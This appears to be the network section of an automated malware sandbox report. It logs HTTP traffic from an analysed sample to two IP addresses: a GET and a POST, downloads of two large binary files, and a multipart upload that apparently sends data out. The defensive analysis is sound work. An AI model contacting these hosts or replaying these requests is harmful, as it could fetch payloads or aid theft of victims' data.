Home
Result
Report
Detail Analysis

Network Analysis

Download pcap

Hosts 2 DNS 0 TCP 2 UDP 4 HTTP(S) 5 ICMP 0 IRC 0 Suricata Snort

IP Address	Status	Action
185.163.204.212	Active	Moloch
185.163.204.22	Active	Moloch

Name	Response	Post-Analysis Lookup
No hosts contacted.

TCP Requests
- 192.168.56.103:49164 185.163.204.212:80
- 192.168.56.103:49162 185.163.204.22:80

UDP Requests

GET 200 http://185.163.204.22/h_johng_1

REQUEST

GET /h_johng_1 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: 185.163.204.22

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Sun, 16 Jan 2022 13:45:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: stel_ssid=8f624286ead7c97c93_1737346538232670995; expires=Mon, 17 Jan 2022 13:45:46 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store Strict-Transport-Security: max-age=35768000 Access-Control-Allow-Origin: *

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.163.204.212/

REQUEST

POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 185.163.204.212

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Sun, 16 Jan 2022 13:45:47 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: *

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

GET 200 http://185.163.204.212//l/f/V2wjY34BZ2GIX1a3CfZQ/9793afce9b044420562016021dfd1363c16e137d

REQUEST

GET //l/f/V2wjY34BZ2GIX1a3CfZQ/9793afce9b044420562016021dfd1363c16e137d HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.163.204.212

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Sun, 16 Jan 2022 13:45:48 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Fri, 07 Jan 2022 23:09:58 GMT ETag: "61d8c846-dfcff" Accept-Ranges: bytes

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

GET 200 http://185.163.204.212//l/f/V2wjY34BZ2GIX1a3CfZQ/41ea5daae73201e6bf87b354770f4ec90d43950f

REQUEST

GET //l/f/V2wjY34BZ2GIX1a3CfZQ/41ea5daae73201e6bf87b354770f4ec90d43950f HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.163.204.212

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Sun, 16 Jan 2022 13:45:55 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Fri, 07 Jan 2022 23:09:57 GMT ETag: "61d8c845-2b281b" Accept-Ranges: bytes

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

POST 200 http://185.163.204.212/

REQUEST

POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 20400 Host: 185.163.204.212

RESPONSE

HTTP/1.1 200 OK Server: nginx Date: Sun, 16 Jan 2022 13:46:00 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: *

BODY

request response

plaintext hex

16 bytes 32 bytes 48 bytes 64 bytes

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts